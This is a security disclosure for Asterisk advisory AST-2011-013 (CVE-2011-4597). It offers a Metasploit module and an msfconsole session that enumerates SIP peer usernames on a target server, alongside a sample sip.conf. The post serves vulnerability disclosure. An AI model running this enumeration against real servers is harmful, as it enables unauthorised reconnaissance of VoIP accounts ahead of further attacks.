A Metasploit module is attached that demonstrates how to enumerate
Asterisk sip peers that have a nat setting different to the global sip
nat setting as described in Asterisk Security Advisory AST-2011-013.
The example below finds all peers with nat=yes, but the metasploit module
will also work when global nat=yes and peers have nat=no.
Vulnerability discovered and exploit created by Ben Williams.
References:
http://downloads.asterisk.org/pub/security/AST-2011-013.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4597
Example sip.conf:
[general]
context=default
alwaysauthreject = yes
[1000]
nat=yes
type=peer
secret=12345cdsf0sd9r2e9
callerid=John Doe <1000>
host=dynamic
context=trusted
[1001]
nat=yes
secret=12345
type=peer
host=dynamic
[1002]
secret=12345a
type=peer
host=dynamic
# svn co https://www.metasploit.com/svn/framework3/trunk/
# cp enumerator_asterisk_nat_peers.rb trunk/modules/auxiliary/scanner/sip/
# cd trunk
# msfconsole
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 716 exploits - 362 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13462 updated 143 days ago (2011.08.01)
Warning: This copy of the Metasploit Framework was last updated 143 days
ago.
We recommend that you update the framework at least every
other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf > use auxiliary/scanner/sip/enumerator_asterisk_nat_peers
msf auxiliary(enumerator_asterisk_nat_peers) > info
Name: SIP Username Enumerator for Asterisk (UDP) Security
Advisory AST-2011-013, CVE-2011-4597
Module: auxiliary/scanner/sip/enumerator_asterisk_nat_peers
Version: 1
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Ben Williams
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe
in each set
CHOST no The local client address CPORT 5070 no The local client port MAXEXT 9999 yes Ending extension MINEXT 0 yes Starting extension PADLEN 4 yes Cero padding maximum lengthRHOSTS yes The target address range or CIDR identifier
RPORT 5060 yes The target port THREADS 1 yes The number of concurrent threads Description: REGISTER scan for numeric peer usernames having a nat setting different to global sip nat setting. Works even when alwaysauthreject=yes. For this exploit to work, the source port cannot be 5060. For more details see Asterisk Project Security Advisory - AST-2011-013 msf auxiliary(enumerator_asterisk_nat_peers) > set RHOSTS 172.16.0.1 RHOSTS => 172.16.0.1 msf auxiliary(enumerator_asterisk_nat_peers) > set MINEXT 1000 MINEXT => 1000 msf auxiliary(enumerator_asterisk_nat_peers) > set MAXEXT 2000 MAXEXT => 2000 msf auxiliary(enumerator_asterisk_nat_peers) > run [*] Found user: 1000 <sip:1000@xxxxxxxxxx> [Auth] [*] Found user: 1001 <sip:1001@xxxxxxxxxx> [Auth] [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(enumerator_asterisk_nat_peers) >
Attachment:
enumerator_asterisk_nat_peers.rb
Description: application/ruby